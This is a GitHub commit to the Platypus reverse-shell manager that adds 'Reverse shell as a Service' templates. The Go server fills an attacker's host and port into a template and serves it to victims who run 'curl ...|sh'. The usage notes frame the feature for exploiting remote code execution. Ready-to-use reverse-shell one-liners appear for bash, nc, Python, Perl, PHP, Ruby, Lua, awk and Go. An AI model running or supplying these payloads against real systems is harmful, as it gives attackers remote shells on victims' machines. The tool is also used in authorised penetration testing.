Skip to content

Commit

Permalink
[+] RaaS support specifying language via tpl #30, thanks for @RicterZ
Browse files Browse the repository at this point in the history
  • Loading branch information
WangYihang committed Jan 23, 2021
1 parent 9f80cc7 commit b9f47da
Show file tree
Hide file tree
Showing 11 changed files with 58 additions and 18 deletions.
14 changes: 8 additions & 6 deletions USAGE.md
Original file line number Diff line number Diff line change
@@ -1,9 +1,11 @@
#### Reverse shell as a Service
```bash
// Platypus is able to multiplexing the reverse shell listening port
// The port 8080 can receive reverse shell client connection
// Also these is a Reverse shell as a service running on this port
## Reverse shell as a Service
Platypus is able to multiplexing the reverse shell listening port. The port 8080 can receive reverse shell client connection, also these is a Reverse Shell as a Service (RaaS) running on this port.

Assume that you have got an arbitrary rce on the target application, but the target application will strip the non-alph letter like `&`, `>`. then this feature will be useful.

To archive this, all you need is to construct a url which indicate the target

```bash
// victim will be redirected to attacker-host attacker-port
// sh -c "$(curl http://host:port/attacker-host/attacker-port)"
# curl http://192.168.1.2:8080/attacker.com/1337
Expand All @@ -17,7 +19,7 @@ curl http://192.168.1.2:8080/192.168.1.2/8080|sh
# sh -c "$(curl http://host:port/)"
```
#### RESTful API
## RESTful API
* `GET /client` List all online clients
```
# curl 'http://127.0.0.1:9090/client'
Expand Down
53 changes: 41 additions & 12 deletions lib/context/server.go
Original file line number Diff line number Diff line change
Expand Up @@ -3,6 +3,7 @@ package context
import (
"bytes"
"fmt"
"io/ioutil"
"net"
"os"
"strconv"
Expand Down Expand Up @@ -86,6 +87,7 @@ func (s *TCPServer) Run() {
listener.Close()
return
default:
var err error
conn, err := listener.Accept()
if err != nil {
continue
Expand Down Expand Up @@ -126,24 +128,51 @@ func (s *TCPServer) Run() {
httpHost = headerValue
}
}
var command string = fmt.Sprintf(
"curl http://%s/%s/%d|sh\n",
httpHost,
GetHostname(httpHost),
GetPort(httpHost, s.Port),
)

// eg:
// "/python" -> {"", "python"}
// "/8.8.8.8/1337" -> {"", "8.8.8.8", "1337"}
// "/8.8.8.8/1337/python" -> {"", "8.8.8.8", "1337", "python"}
target := strings.Split(requestURI, "/")
if strings.HasPrefix(requestURI, "/") && len(target) == 3 {
host := target[1]
port, err := strconv.Atoi(target[2])
if err == nil {
command = fmt.Sprintf("bash -c 'bash -i >/dev/tcp/%s/%d 0>&1'\n", host, port)
} else {

// step 1: parse host and port, default set to the platypus listening port currently
host := GetHostname(httpHost)
var port uint16
port = GetPort(httpHost, s.Port)

if strings.HasPrefix(requestURI, "/") && len(target) > 2 {
host = target[1]
// TODO: ensure the format of port is int16
t, err := strconv.Atoi(target[2])
port = uint16(t)
if err != nil {
log.Debug("Invalid port number: %s", target[2])
}
} else {
log.Debug("Invalid HTTP Request-Line: %s", buffer[:n])
}

// step 2: parse language
language := "bash"
if len(target) > 0 {
// language is the last element of target
language = strings.Replace(target[len(target)-1], ".", "", -1)
}

// step 3: read template
// template rendering in golang tastes like shit,
// here we will trying to use string replace temporarily.
// read reverse shell template file from lib/template/rsh/*
templateFilename := fmt.Sprintf("lib/template/rsh/%s.tpl", language)
templateContent, _ := ioutil.ReadFile(templateFilename)

// step 4: render target host and port into template
renderedContent := string(templateContent)
renderedContent = strings.Replace(renderedContent, "__HOST__", host, -1)
renderedContent = strings.Replace(renderedContent, "__PORT__", strconv.Itoa(int(port)), -1)
command := fmt.Sprintf("%s\n", renderedContent)

// step 5: generate HTTP response
client.Write([]byte("HTTP/1.0 200 OK\r\n"))
client.Write([]byte(fmt.Sprintf("Content-Length: %d\r\n", len(command))))
client.Write([]byte("\r\n"))
Expand Down
1 change: 1 addition & 0 deletions lib/template/rsh/awk.tpl
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
awk 'BEGIN {s = "/inet/tcp/0/__HOST__/__PORT__"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null
1 change: 1 addition & 0 deletions lib/template/rsh/bash.tpl
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
bash -c 'bash -i >/dev/tcp/__HOST__/__PORT__ 0>&1'
1 change: 1 addition & 0 deletions lib/template/rsh/go.tpl
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","__HOST__:__PORT__");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go
1 change: 1 addition & 0 deletions lib/template/rsh/lua.tpl
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
lua -e "require('socket');require('os');t=socket.tcp();t:connect('__HOST__','__PORT__');os.execute('/bin/sh -i <&3 >&3 2>&3');"
1 change: 1 addition & 0 deletions lib/template/rsh/nc.tpl
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
nc -c /bin/bash __HOST__ __PORT__
1 change: 1 addition & 0 deletions lib/template/rsh/perl.tpl
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
perl -e 'use Socket;$i="__HOST__";$p=__PORT__;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
1 change: 1 addition & 0 deletions lib/template/rsh/php.tpl
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
php -r '$sock=fsockopen("__HOST__",__PORT__);shell_exec("/bin/sh -i <&3 >&3 2>&3");'
1 change: 1 addition & 0 deletions lib/template/rsh/python.tpl
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("__HOST__",__PORT__));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
1 change: 1 addition & 0 deletions lib/template/rsh/ruby.tpl
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
ruby -rsocket -e'f=TCPSocket.open("__HOST__",__PORT__).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

0 comments on commit b9f47da

Please sign in to comment.